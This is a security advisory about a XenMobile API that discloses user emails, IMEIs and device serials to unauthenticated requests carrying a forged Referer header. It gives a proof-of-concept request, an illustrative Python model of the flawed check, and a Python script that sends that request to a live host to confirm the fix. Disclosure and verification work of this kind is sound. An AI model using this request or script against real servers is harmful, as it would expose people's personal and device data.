Advisory:

Xen Mobile leaks device information including personal data

Vulnerability

Data about users and devices, including email addresses and IMEI identifiers, can be obtained without authentication by making API calls

Current state: Fixed

CVSS Summary

CVSS v2 base score for this vulnerability: 5.0 (Medium)
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

  Access Vector       Network
  Access Complexity   Low
  Authentication      None
  Confidentiality     Partial
  Integrity           None
  Availability        None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Data about users and devices, including email addresses and IMEI identifiers, can be obtained without authentication by making API calls:

GET /zdm/rs/xdmServices/autoAction/execution/list HTTP/1.1
Host: xenmobile.example.com
Referer: https://xenmobile.example.com/zdm/cxf/xdmServices/login.jsp

XenMobile answers this request with a set of records containing the following fields, which identify both the user and the device:

actionData, activationDate, createdDate, deviceId, deviceImei, deviceSerial, id, model, osFamily, provisioningId, status, triggerData, userName

This is possible because XenMobile uses the Referer header to decide whether a request to this API is allowed. The Referer is an ordinary request header written by the client, so an attacker can set it to any value; a check on it proves nothing about who is calling and is not an authentication mechanism.
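The following is an added illustration, not Citrix code: it models the access rule the advisory describes (allow the API call if the Referer names the XenMobile login page) beside a rule that requires a server-issued session, and sends the same attacker request against both. The host name, the cookie name, the sample record values and the session store are assumptions made for the example.

```python
"""Why a Referer check is not authentication (illustrative model, not XenMobile code)."""
from __future__ import annotations

import secrets
from dataclasses import dataclass, field
from typing import Callable

LOGIN_PAGE = "https://xenmobile.example.com/zdm/cxf/xdmServices/login.jsp"
ENDPOINT = "/zdm/rs/xdmServices/autoAction/execution/list"

# Constructed sample records using the field names listed in the advisory.
SAMPLE_RECORDS = [
    {"id": 1, "userName": "alice@example.com", "deviceImei": "356938035643809",
     "deviceSerial": "F2LXK0ABC", "model": "iPhone", "osFamily": "iOS", "status": "OK"},
    {"id": 2, "userName": "bob@example.com", "deviceImei": "490154203237518",
     "deviceSerial": "R58M12XYZ", "model": "SM-G960F", "osFamily": "Android", "status": "OK"},
]


@dataclass
class Request:
    path: str
    headers: dict[str, str] = field(default_factory=dict)
    cookies: dict[str, str] = field(default_factory=dict)


def referer_allows(req: Request) -> bool:
    """Vulnerable rule: the Referer is written by the client, so this only
    verifies that the caller knows the login page URL."""
    return req.headers.get("Referer", "").startswith(LOGIN_PAGE)


class SessionStore:
    """Minimal server-side session table (assumed design for the example)."""

    def __init__(self, credentials: dict[str, str]) -> None:
        self._credentials = credentials
        self._sessions: dict[str, str] = {}

    def login(self, user: str, password: str) -> str | None:
        # compare_digest avoids leaking the password through comparison timing.
        stored = self._credentials.get(user)
        if stored is None or not secrets.compare_digest(stored, password):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = user
        return token

    def user_for(self, token: str) -> str | None:
        return self._sessions.get(token)


def session_allows(req: Request, store: SessionStore) -> bool:
    """Fixed rule: only a token the server issued after a successful login is
    accepted; the Referer plays no part in the decision."""
    token = req.cookies.get("JSESSIONID")
    return token is not None and store.user_for(token) is not None


def handle(req: Request, allowed: Callable[[Request], bool]) -> tuple[int, list[dict] | None]:
    """Serve the list endpoint under whichever access rule is supplied."""
    if req.path != ENDPOINT:
        return 404, None
    if allowed(req):
        return 200, SAMPLE_RECORDS
    return 401, None


def demo() -> dict[str, int]:
    """Run one forged request against both rules and return the HTTP statuses."""
    store = SessionStore({"alice@example.com": "correct-horse-battery"})

    def fixed(r: Request) -> bool:
        return session_allows(r, store)

    forged = Request(ENDPOINT, headers={"Referer": LOGIN_PAGE})
    guessed_cookie = Request(ENDPOINT, headers={"Referer": LOGIN_PAGE},
                             cookies={"JSESSIONID": secrets.token_urlsafe(32)})
    token = store.login("alice@example.com", "correct-horse-battery")
    assert token is not None
    real = Request(ENDPOINT, cookies={"JSESSIONID": token})  # no Referer at all

    return {
        "referer_check_forged_referer": handle(forged, referer_allows)[0],
        "session_check_forged_referer": handle(forged, fixed)[0],
        "session_check_guessed_cookie": handle(guessed_cookie, fixed)[0],
        "session_check_real_login": handle(real, fixed)[0],
    }


if __name__ == "__main__":
    for case, status in demo().items():
        print(f"{case:32} -> HTTP {status}")
```

The forged request is accepted by the Referer rule and rejected by the session rule, while a request carrying a genuine session cookie and no Referer at all is accepted by the session rule: the header is irrelevant to who the caller is, which is the whole point.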

Advisory timeline

2018-03-28 – Reported to Citrix and acknowledged immediately

2018-05-21 – Issue reported fixed

 

Mitigation/further actions

  1. Require an authenticated session before the API returns this type of information; a check on a client-supplied header such as Referer is not a substitute
  2. Remove public access to this service by moving it inside your network and configuring mobile devices to reach it via a VPN or an authenticating proxy
  3. Install the vendor update rectifying this issue as soon as it is available
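After applying an update or moving the service behind a VPN or proxy, an operator will want to confirm that the endpoint no longer answers the request shown in the proof of concept. The script below is an added example for that purpose, not Citrix tooling: it issues the advisory's unauthenticated GET with a forged Referer and no session cookie, then classifies the reply. The host name is an assumption, the JSON shape is only guessed from the field list in the advisory, and it must only be pointed at servers you are authorised to test.

```python
"""Check whether a XenMobile host still serves the unauthenticated list request."""
from __future__ import annotations

import json
import sys
import urllib.error
import urllib.request

ENDPOINT = "/zdm/rs/xdmServices/autoAction/execution/list"
# Fields from the advisory that identify a person or a device.
SENSITIVE_FIELDS = {"userName", "deviceImei", "deviceSerial"}


def build_request(host: str) -> urllib.request.Request:
    """The advisory's request: no credentials, only a Referer naming the login page."""
    return urllib.request.Request(
        f"https://{host}{ENDPOINT}",
        headers={"Referer": f"https://{host}/zdm/cxf/xdmServices/login.jsp"},
        method="GET",
    )


def extract_records(body: str) -> list[dict]:
    """Return the list of objects in the reply, whether it is a bare JSON list or
    a wrapper object holding one (the exact shape is not given in the advisory)."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if isinstance(data, list):
        return [r for r in data if isinstance(r, dict)]
    if isinstance(data, dict):
        for value in data.values():
            if isinstance(value, list):
                return [r for r in value if isinstance(r, dict)]
    return []


def classify(status: int, body: str) -> str:
    """Map status and body to a verdict. A 200 only counts as exposure when the
    body actually carries the user/device fields the advisory lists."""
    if status in (401, 403):
        return "fixed: request rejected without authentication"
    if status in (301, 302, 303, 307, 308):
        return "fixed: redirected (presumably to the login page)"
    if status == 200:
        records = extract_records(body)
        leaked = {f for r in records for f in r if f in SENSITIVE_FIELDS}
        if leaked:
            return f"EXPOSED: {len(records)} records with fields {sorted(leaked)}"
        return "200 but no user/device records found: inspect the body manually"
    return f"inconclusive: HTTP {status}"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop at the first response: a 302 to login is itself a meaningful answer."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # urllib then raises HTTPError for the 3xx instead of following it


def check(host: str, timeout: float = 10.0) -> str:
    """Send the request to a live host and classify what comes back."""
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(build_request(host), timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        # Non-2xx responses arrive here; the body is still worth classifying.
        return classify(e.code, e.read().decode("utf-8", "replace"))
    except urllib.error.URLError as e:
        return f"inconclusive: {e.reason}"


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: check_xenmobile.py <host>")
    print(check(sys.argv[1]))
```

Only `check()` touches the network; `classify()` and `extract_records()` work on captured responses, so a reply saved from a proxy can be fed through them offline.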